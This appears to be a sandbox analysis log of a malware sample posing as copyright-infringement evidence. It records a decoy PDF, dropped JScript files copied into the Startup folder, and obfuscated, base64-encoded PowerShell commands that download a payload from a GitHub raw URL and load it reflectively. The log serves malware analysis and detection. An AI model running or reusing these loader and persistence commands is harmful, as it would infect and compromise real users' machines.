Source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: wscript.exe, 00000008.00000002.2758183805.000001C4CE21B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE21B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2751445693.000001C4CE1D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2749879678.000001C4CE21B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757590871.000001C4CE1D9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757757051.00000245917A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2747396981.0000024591724000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2751344007.0000024591758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750192999.00000245917A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757155199.000002459175E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000019.00000003.2500215161.00000204E74C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fso.CopyFile(appDirs[i] + "\\VMware\\*.dmp", esporim + "\\Dumps\\");
Source: wscript.exe, 0000002C.00000003.2828182753.000001A7C49CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2825381568.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3471646885.000001A7C49CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW~
Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2070984351.00000139D8A3D000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069859428.00000139D8A3C000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A3E000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A42000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A3E000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A3E000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A3E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 0000002C.00000002.3474677234.000001A7C6855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: I@\Global_Config\VMware Server\SSLcNR
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18DA298 CloseHandle,UnhandledExceptionFilter,SetUnhandledExceptionFilter,memcmp,memmove,__current_exception_context,__CxxFrameHandler3,__current_exception,__C_specific_handler,memmove, 0_2_00007FF7A18DA298
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe Network Connect: 188.114.96.3 443
Source: Yara match File source: amsi64_8000.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_1784.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_8824.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_9176.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_3668.amsi.csv, type: OTHER
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLA
CcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2p_bee.js
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2x_bee.js
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2p_bee.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2x_bee.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArA
CcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
